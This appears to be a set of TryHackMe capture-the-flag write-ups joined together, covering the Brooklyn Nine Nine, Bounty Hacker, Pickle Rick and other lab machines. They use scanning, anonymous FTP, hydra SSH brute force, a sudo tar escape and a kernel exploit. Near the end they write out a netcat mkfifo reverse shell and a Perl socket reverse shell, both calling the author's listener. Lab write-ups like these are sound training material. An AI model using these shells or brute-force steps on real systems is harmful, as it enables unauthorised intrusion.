Welcome to my WriteUp. Ok So before starts question we need to enumerate the mechine. So Let’s do it with nmap

Enumurate The Mechine

# nmap -sC -sV -oN nmap/initial $ip                                                                                                                                1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 02:32 +06
Nmap scan report for 10.10.2.40
Host is up (0.42s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.43.245
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.26 seconds

We Get

Port Open
21 FTP (Anonymous Login Allow)
22 SSH 
80 HTTP 

Enumurate FTP

The server allow us to login anonymously so just login and get what is inside.

	Username : Anonymous
	Password : Anonymous
	

File name is note_to_jake.txt

From Amy,

Jake please change your password. It is too weak and 
holt will be mad if someone hacks into the nine nine

Enumurate HTTTP / Port 80

After visiting the website there is just a picture and some text in the bottom, Nothing usefull here. If you go to the code of the website then you can see at the bottom there is a text

So, Let’s download the picture and do some steganography on it

	wget $ip/brooklyn99.jpg
	I used steghide for cracking stuff if it ask for any password then use stegcracker first then steghide.
	If you don't know how to use steghide use the command steghide --help and at the bottom you will have some exmple I hope it will help you.

After cracking we have a file called note.txt

		H***ts Pass***rd:
		flu***og12@ni***ine

Enjoy!!

It looks like a username with password. We already check FTP and HTTP It’s time to do something with SSH/Port 22. Use credintials from note.txt and login on SSH.

Get into The Mechine

After Login

h**t@brookly_nine_nine:~$ ls
nano.save user.txt
h**t@brookly_nine_nine:~$ cat user.txt
ee1****19052**0b*7aa****060c23e*

Now we have user.txt It’s time to root the mechine

I used the command sudo -l to see what do we need to be sudo

holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano
holt@brookly_nine_nine:~$ 

Here you can see nano can be sudo with no password. Now, you have to find how you can exploit a mechine VIA nano.

I always use GTFObins it’s such a resourceful and helpful website for this type of exploit.

So, after you go to GTFObins search for nano then find sudo and do those things as it says.

After Being sudo

# cd /root && ls        
root.txt
# cat root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: 63***0ea7bb9***0796b6*****4818*5

Enjoy!!
# 

The End

If you having any problem on the mechine fell free to ping me on Twitter it’s @lifeofdekisugi

Thank You for reading my write up. Don’t forget to tell me your experiance tag me on twitter @lifeofdekisugi.

OverlayFS - CVE-2021-3493

Welcome to OverlayFS AKA CVE-2021-3493. I’m learning how to writeup so please pardon my mistakes. Let’s be honest this room dosen’t need any writeup but don’t know why I made it haha and Let’s kick things of with some recources to know what is this CVE about.

https://ubuntu.com/security/CVE-2021-3493

https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/

https://github.com/briskets/CVE-2021-3493

Ok so after knowing what all this about now we can dirty our hands on it.

SSH creds :

Username: overlay

Password: tryhackme123

Get the exploit.c from github or here

Get the exploit file to SSH mechine and compile it.

Probably I would tell you how to compile a .c file but this is not a walkthrough :D :D

So, after compile give the file execute permission and the execute it with ./filename

tada Run whoami in the terminal and magic now you are root

How to get the root flag ?

Root flag is too close to root :)

After completing this room don’t forget to thanks NinjaJc01 creator of this room.

#happyhacking #tryhackme

Welcome to Web Fundamentals TryHackMe Write Up.

Task 1 - INTRODUCTION AND OBJECTIVES

NO ANSWER NEEDED

Task 2 - HOW DO WE LOAD WEBSITES?

Things you shoould remember from here.

1. HTTP runs on port 80
2. HTTPS runs on port 443
3. HTTPS uses TLS 1.3
	
4. GET = When we need something from web server.
5. POST = When we send something to web server.
	
Extra : The actual content of the web page is normally a combination of HTML, CSS and JavaScript.
HTML defines the structure of the page, and the content. CSS allows you to change how the page looks 
and make it look fancy. JavaScript is a programming language that runs in the browser and allows you 
to make pages interactive or load extra content.
	

Question 1 : What request verb is used to retrieve page content?

Hint : When we want soomething from server.

Question 2 : What port do web servers normally listen on?

Hint : Normally webservers run on HTTP.

Question 3 : What’s responsible for making websites look fancy ?

Hint : Read Extra carefully.

Task 3 - MORE HTTP - VERBS AND REQUESTS FORMATS

Things you shoould remember from here.

1. For GET requests, a body is allowed but will mostly be ignored by the server.
2. Learn Web Responses it will help you in many cases.

Web Response : https://developer.mozilla.org/en-US/docs/Web/HTTP/Status

Question 1 : What verb would be used for a login?

Hint : We sending our data to web server.

Question 2 : What verb would be used to see your bank balance once you’re logged in?

Hint : We want our balance from bank web server.

Question 3 : Does the body of a GET request matter? Yea/Nay

Hint : It’s on your remember list of this task.

Question 4 : What’s the status code for “I’m a teapot”?

Hint : Learn Web Responses thorowly.

Question 5 : What status code will you get if you need to authenticate to access some content, and you’re unauthenticated?

Hint : What is the status code of Unauthorized ?

Task 4 - Cookies, tasty!

Please Read the task discription you will understad everything from there.

No Answer Needed

Task 5 - MINI CTF

Things you shoould remember from here.

1. You can make web requests from your terminal/cmd using *curl*
2. If you use curl *http://tryhackme.com* it will send a GET request by default you can change the request type using *-X POST* remember *-X* is request type changing paramiter.

** Task Details **

GET request. Make a GET request to the web server with path /ctf/get
POST request. Make a POST request with the body "flag_please" to /ctf/post
Get a cookie. Make a GET request to /ctf/getcookie and check the cookie the server gives you
Set a cookie. Set a cookie with name "flagpls" and value "flagpls" in your devtools (or with curl!) and make a GET request to /ctf/sendcookie

Question 1 : What’s the GET flag?

Hint : Send a get request from terminal. Exm:{curl IP:8081/ctf/get}

Question 2 : What’s the POST flag?

Hint : To get the post flag you have to send a post request with a body. To write a body you need to spacify –data Exm:{curl -X POST IP:8081/ctf/post –data “flag_please”}

Question 3 : What’s the “Get a cookie” flag?

Hint : Go to the URL {IP:8081/ctf/getcookie} and check your cookies.

How to check your cookies ?
Answer : Browser developer tools/Inspect element --> Storeg --> Cookies

Question 4 : What’s the “Set a cookie” flag?

Hint : Go to the URL {IP:8081/ctf/sendcookie} go to cookies you will see a + icon there click the icon and create a new cookie name of the cookie will be flagpls and value also flagpls. After typing press Enter and reload the page.

Thanks for reading the Write Up. See You.

Welcome to my WriteUp. Ok So our journy starts from question 3 but before every question we need to enumerate the mechine. So Let’s do it with nmap

Service enumeration

# nmap -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 02:25 +06
Nmap scan report for 10.10.196.2
Host is up (0.31s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.67.68
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.50 seconds

Here we have port 21,22,80 open and we can see ftp have anonymous login allowed so let’s do it.

Username : Anonymous
Password : Anonymous # In this mechine we don't need password to login.

FTP enumeration

# ftp $ip
Connected to 10.10.196.2.
220 (vsFTPd 3.0.3)
Name (10.10.196.2:root): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07 21:41 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07 21:47 task.txt
226 Directory send OK.

Here we have 2 text file. Grab it on our computer using mget * If You want to download file one by one then you can simply use get filename.ext

ftp> mget *
mget locks.txt? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
226 Transfer complete.
418 bytes received in 0.00 secs (350.0884 kB/s)
mget task.txt? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.00 secs (220.6188 kB/s)
ftp> exit
221 Goodbye.

Ok So now we have two text file. From this two we will get our 3rd question answer. If we look at question number 4 it say’s What service can you bruteforce with the text file found? The text file locks.txt looks like a dictionary file we can bruteforce with this file on ssh using hydra.

Bruteforce

-l (Username) -P (Password file)

hydra -l lin -P ./locks.txt ssh://$ip 
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-27 02:31:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.196.2:22/
[22][ssh] host: $ip   login: lin   password: Re***4g***yn***at*
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-28 02:32:03

Now we have ssh username and password so let’s login on ssh.

# ssh lin@$ip

lin@10.10.196.2's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)


lin@bountyhacker:~/Desktop$ ls
user.txt
lin@bountyhacker:~/Desktop$ cat user.txt
THM{C****_SyN******}

Here we got our User.txt

Privilege Escalation

Now we have to get root.txt

If you try :

lin@bountyhacker:~/Desktop$ cat /root/root.txt
cat: /root/root.txt: Permission denied

So we have to get root access. Start with ** sudo -l **

lin@bountyhacker:~$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

We can run root using ** tar ** Now we need to find Root Escalation for tar. I always use gtfobins.github.io for this type of escalation. If we search tar on GTFOBINS then we will found a line of code in Sudo Section

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

You need to copy this code and pest on your bountyhacker ssh shell

lin@bountyhacker:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{8***Y_h****r}

Congratulations you just complete Bounty Hacker from TryHackMe. Thank You and see you on next writeup.

Introduction

Nmap scan

nmap -sC -sV -oN nmap/initial $ip

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

gobuster scan

gobuster dir -u $ip -w /usr/share/dirb/wordlists/common.txt

2020/05/19 17:03:32 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/content (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)

scan the /content

gobuster dir -u $ip/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

2020/05/19 17:07:27 Starting gobuster
===============================================================
/images (Status: 301)
/js (Status: 301)
/inc (Status: 301)
/as (Status: 301)
/_themes (Status: 301)
/attachment (Status: 301)

search for vuln

searchsploit sweetrice

cat the backup vuln there is the link of mysql backup

read the file there will be a password (encrypted)

crack from crackstation

then login

username: manager passwd : Password123

echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.2.162 5554 >/tmp/f’ >/etc/copy.sh

then start the listner on host 5554

start the backup.pl as sudo {sudo /usr/bin/perl /home/itguy/backup.pl}

cd /root/ cat root.txt

Nmap Scan

nmap -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-24 13:25 EDT
Nmap scan report for 10.10.9.58
Host is up (0.39s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f0:a7:c7:d0:a7:0b:25:6c:d6:be:d9:5a:93:1c:d4:12 (RSA)
|   256 4f:16:df:a2:16:a0:44:05:bb:f5:f9:90:5f:54:fd:c4 (ECDSA)
|_  256 b6:cf:99:03:97:02:a8:47:39:ef:d0:06:df:66:a7:47 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.28 seconds

From source code

    Note to self, remember username!

    Username: R1ckRul3s

Gobuster scan 1

gobuster dir -u $ip -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.9.58
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/24 13:25:57 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/assets (Status: 301)
/index.html (Status: 200)
********* /robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/05/24 13:28:05 Finished
===============================================================

From /robots.txt


`
Wubbalubbadubdub
`

Gobuster scan 2

gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.9.58
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/05/24 13:34:09 Starting gobuster
===============================================================
/index.html (Status: 200)
********/login.php (Status: 200)
/assets (Status: 301)
/portal.php (Status: 302)
Progress: 1075 / 220561 (0.49%)^Z

Go to /login.php

use username from source code password from robots.txt

we can’t use in the server

so let’s do a reverse shell

command line : perl -e 'use Socket;$i="10.9.2.162";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 

host : nc -lnvp 9999

ls there is one key

cd /home/rick {there is second key}

sudo -l {we can access root without any password}

sudo su

cd /root {3rd key}